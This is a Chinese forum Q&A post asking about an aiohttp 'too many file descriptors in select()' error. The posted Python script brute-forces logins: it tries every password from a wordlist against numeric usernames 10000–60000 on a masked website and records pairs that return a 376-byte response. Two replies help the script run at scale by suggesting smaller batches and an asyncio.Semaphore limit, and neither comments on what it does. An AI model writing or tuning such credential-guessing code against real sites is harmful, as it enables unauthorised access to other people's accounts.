python的aiohttp错误提示
用aiohttp和asyncio构建的网络爬虫如果url太多,出现错误提示:ValueError: too many file descriptors in select()
import aiohttp
import asyncio
import time
timeclock=time.clock()
pwd_all=[]
with open("pwd.txt","r+",encoding='utf-8') as fob:
for b in fob.readlines():
pwd_all.append(b.strip())
oklist=[]
async def hello(name):
async with aiohttp.ClientSession() as session:
for pwd in pwd_all:
payload={'name':name,'password':pwd}
async with session.post('http://www.xxxxxxx.com',data=payload) as resp:
backdata=await resp.text()
if len(backdata)==376:
oklist.append("{}:{}".format(name,pwd))
break
loop = asyncio.get_event_loop()
tasks = [hello(str(uname)) for uname in range(10000,60000)]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
print(oklist)
print("time is:"+str(time.clock()-timeclock))
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
tasks = [hello(str(uname)) for uname in range(10000,12000)]
先改小一点,一上来就5万个,扯着蛋了~
在windows环境下,最多只能1024个线程,多了就报错,
asyncio
调用底层的select()
,所以,最好控制下您的线程数量。当然您也可以使用线程池
asyncio.Semaphore(number)
,就像这样: